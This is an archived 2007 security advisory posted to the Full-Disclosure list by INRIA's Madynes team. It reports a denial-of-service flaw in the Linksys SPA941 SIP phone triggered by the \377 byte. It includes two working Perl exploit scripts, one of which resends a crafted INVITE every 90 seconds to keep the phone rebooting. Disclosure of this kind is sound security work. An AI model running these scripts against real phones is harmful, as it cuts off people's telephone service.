lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <015e01c7866c$e5ed1ba0$071a5198@Crocodile>
Date: Tue, 24 Apr 2007 14:34:27 +0200
From: "Radu State" <state@...ia.fr>
To: <full-disclosure@...ts.grok.org.uk>
Subject: Linksys SPA941 remote DOS with \377 character

MADYNES Security Advisory 

 

 <http://madynes.loria.fr/> http://madynes.loria.fr

 

 

Title: Linksys SPA941 remote DOS with \377 character

 

Discovery Date: 01/02/2007 

Vendor notification: 4/04/2007 and 17/04/2007

Release Date: 24/04/2007

 

 

Severity: 

      Moderate - Denial of Service

 

Advisory ID:KIHP3

 

Vulnerability in Linksys SPA941



Synopsis: After sending a crafted SIP messages the device immediately
reboots. The phone does not check properly the metacharacters  \377 in the
SIP field.

 

The vendor was informed and future firmware will be available. This
vulnerability was identified by the Madynes research team at INRIA Lorraine,
using the Madynes VoIP fuzzer.

 

Background: SIP is the IETF standardized (RFCs 2543 and 3261) protocol for
VoIP signalization. SIP is an ASCII based INVITE message is used to initiate
and maintain a communication session.  

 


Configuration of our device:

*	Software Version:5.1.5 
*	IP-Address obtained by DHCP as 192.168.1.107 
*	User Name: linksys

Vulnerability:

It may reboot and/or replies with invalid messages. The phone is not able to
handle well the character \377 (full byte) in a message. Depending where
this character is located the phone may reboot (e.g. in any section of the
FROM header). If this character is located anywhere else it may modify the
content of the reply messages generated by the phone as showed in the
exploit.  It looks like a format string vulnerability, but no effort to
investigate firmware was done.



Exploit 1)



In this exploit we set a \377 character before every carriage return. The
Replies are modified in their Status line and most of the headers are
erased. Different behavior exists depending in the quantity of \377
characters and their location. Linksys IP Phone SPA941 (firmware 5.1.5), can
not cope with the \337 characters in the FROM field when the real (IP port
in the IP packet) is different from the IP port in the SIP-FROM field .

 


Exploit 1)

To run the exploit the file linksys-5.1.5.pl should be launched (assuming
our configurations) as:

perl linksys-5.1.5.pl 192.168.1.107 5060 linksys



POC: 1 

 

#!/usr/bin/perl

use IO::Socket::INET;

die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);

 

$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],

        Proto=>'udp',

        PeerAddr=>$ARGV[0]);

 

                        

$msg = 

"INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\377\r

Via: SIP/2.0/UDP 192.168.1.2;rport;branch=00\377\r

Max-Forwards: 70\377\r

To: lynksys <sip:$ARGV[2]\@$ARGV[0]>\377\r

From: <sip:tucuman\@192.168.1.2>;tag=00\377\r

Call-ID: tucu\@192.168.1.2\377\r

CSeq: 24865 INVITE\377\r

Contact: <sip:tucu\@192.168.1.2>\377\r

Supported: 100rel\377\r

Content-Length: 0\377\r

\r\n";

 

$socket->send($msg);

 

 

 

 

Exploit 2)

 

In order to remote reboot the phone the following PC will work

 

If the phone is called with the POC 2 it will ring. When answering it
reboots immediately. If not it will reboot after some time.

 

The POC will send the killer message every 90 seconds -the time needed for a
reboot and performs the effective DOS. It also opens a socket on the local
machine to avoid sending RST to the phone. The same can be obtained  with a
firewall or a netcat.

 

POC 2:

            

Command: perl script.pl <username> <dst_IP> <SourceIp> <sourceport>

            Eg. Perl script.pl 101 152.81.114.195 152.81.12.93 5060

 

Script Code:

 

#!/usr/bin/perl

 

use IO::Socket;

 

#die "Usage $0 <username> <dst_IP> <Source_IP> <SourcePort>" unless
($ARGV[2]);

die "Usage $0 <username> <dst_IP> <SourceIp> <sourceport>" unless
($ARGV[0]);

 

my $sock = new IO::Socket::INET( LocalHost => $ARGV[2], LocalPort =>
$ARGV[3], Proto => 'udp'); 

$socket=new IO::Socket::INET->new(PeerAddr=>$ARGV[1], PeerPort=> '5060',
Proto=>'udp', LocalAddr=>$ARGV[2], LocalPort=>'5061');

 

$touser=$ARGV[0];

$target=$ARGV[1];

$sourceaddress=$ARGV[2];

$sourceport=$ARGV[3];

$high=2000;

$low=1;

$fromuserid = int(rand( $high-$low+1 ) ) + $low;

my $cseq = "INVITE";

 

$msg = "INVITE sip:$touser\@$target SIP/2.0\r

Via: SIP/2.0/UDP $sourceaddress:$sourceport;branch=z9hG4bK00000\r

From: \377<sip:$fromuserid\@$sourceaddress>;tag=779\r

To: Receiver <sip:$touser\@$target>\r

Call-ID: 10\@$sourceaddress\r

CSeq: 1 $cseq\r

Contact: 779 <sip:$fromuserid\@$sourceaddress>\r

Expires: 1200\r

Max-Forwards: 70\r

Content-Type: application/sdp\r

Content-Length: 133\r

\r

v=0\r

o=0 0 0 IN IP4 $sourceaddress\r

s=Session SDP\r

c=IN  IP4 $sourceaddress\r

t=0 0\r

m=audio 9876 RTP/AVP 0\r

a=rtpmap:0 PCMU/8000\r";

 

$sock or die "no socket :$!";

while (1){

            $socket->send($msg);

            sleep 90;

            }

 

 

Impact: 

A malicious user can remotely crash and perform a denial of service attack
by sending one crafted SIP   messages. This is conceptually similar to the
"ping of death". 

 

Resolution:

 

Fixed software will be available and following recommended best practices
(ie segregating VOIP traffic from data) will be protected from malicious
traffic in most situations. 

 

>>From Linksys response we include the following resolution: This style of
attack, limited to a single end point and executed from behind a secure
firewall, should not affect an entire network and in most cases should
easily be contained by the local network management entity.  Linksys will
directly address this issue with a future release of the phone firmware.

 

 

Distribution: The advisory will be posted on the following websites:

 

madynes.loria.fr  

 

The advisory will be posted to the following mailing lists

 

Voipsec : voipsec@...psa.org.

fulldisclosure: full-disclosure@...ts.grok.org.uk

 

 

Credits:

 

            Balamurugan Karpagavinayagam (Software engineer)

            Humberto J. Abdelnur (Ph.D Student)

            Radu State (Ph.D)

            Olivier Festor (Ph.D)

 

This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using the Madynes VoIP fuzzer.

 

 

 

Information about us: Madynes is a research team at INRIA Lorraine working
on VoIP Security assessment, intrusion detection and prevention.

 

 

 


Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ